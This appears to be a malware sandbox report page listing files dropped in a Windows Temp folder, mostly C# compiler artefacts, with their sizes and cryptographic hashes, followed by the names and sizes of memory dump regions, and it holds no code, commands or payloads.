0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\apzshero\CSCBB371280E72A42ACA82997606E30A2BE.TMP

Filesize
652B

MD5
1ad7553f838d52a4580e3211422e8a4e

SHA1
f2b2fc2787c712979ef11cadcc82839280fab691

SHA256
df591624e1e84a4c7790001b5609a2d98ff769b45df26bd0d82d49b7e1fa8599

SHA512
bcaba0d873d1cac2bff291b9ddd379506487b2833b790b5c292f84adaf9f0ced7bc6fccc40ee88a3b197fa43e456dd16e6a502944b1e06dcf7ad6888be8f532e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\apzshero\apzshero.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\apzshero\apzshero.cmdline

Filesize
369B

MD5
2a181dd1061d4cf592cb2ba64afca385

SHA1
1beb5d0552cd618e440127562aa9179f3963906a

SHA256
4144d7d64db863a396646947528546a083ed09d5ad578fd4be98508225a1a46d

SHA512
578b385b0f14a6d33229c81aa652da00c6ecfe595bb55a0c598619e8e5c073d66806413b9bb830d1bd14dc7b9e2356a0d1676c6cc71a5719835e8db6cc57245b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i53hqiit\CSC8FE626724B4E4E649BEE592F2449BE9.TMP

Filesize
652B

MD5
b031c2d15945a2424b8a32b09b3f313a

SHA1
9c6a099490e45d37fb98773d0062f5395fddbb77

SHA256
d7beb4412bc76cd7c9c6d233da38d9db9906b8612f184d81e686ffdd2ca603c6

SHA512
361689d4b7c6ff2d2a24da9f8d160e3dad8fb35fda688a5ed1e2d38adf8ae07d92956d7cf24c8684b807d839e8ceceeff2f6582f574d5c5baa26d87c25e121ec

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i53hqiit\i53hqiit.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i53hqiit\i53hqiit.cmdline

Filesize
369B

MD5
f887d50c5d393ec730ae9503f6b8377a

SHA1
3a87eab0a18322e30c10885bda4e263c34726fc6

SHA256
7d5f862b43a0903ffc28526b099e100dbd6eba208a2f01d64b8b2e8ddd8457a8

SHA512
53b06afbe23eb13392978649855d91f44c89af387bd0b3fa32a6be0173837ab89df2e94eba6fff9bda1c93bd9b00fa4c8e733dfca7688f371a1e009851012343

Download Submit
memory/412-199-0x0000015221460000-0x0000015221468000-memory.dmp

Filesize
32KB

Download
memory/3544-115-0x000002203B190000-0x000002203B1E0000-memory.dmp

Filesize
320KB

Download
memory/3856-85-0x00000170B20F0000-0x00000170B2134000-memory.dmp

Filesize
272KB

Download
memory/3856-83-0x00007FFF0A650000-0x00007FFF0B111000-memory.dmp

Filesize
10.8MB

Download
memory/3856-103-0x00007FFF0A650000-0x00007FFF0B111000-memory.dmp

Filesize
10.8MB

Download
memory/3856-73-0x0000017099020000-0x0000017099042000-memory.dmp

Filesize
136KB

Download
memory/3856-72-0x00007FFF0A653000-0x00007FFF0A655000-memory.dmp

Filesize
8KB

Download
memory/3856-84-0x00007FFF0A650000-0x00007FFF0B111000-memory.dmp

Filesize
10.8MB

Download
memory/3856-99-0x00000170B1E90000-0x00000170B1E98000-memory.dmp

Filesize
32KB

Download
memory/3856-86-0x00000170B21C0000-0x00000170B2236000-memory.dmp

Filesize
472KB

Download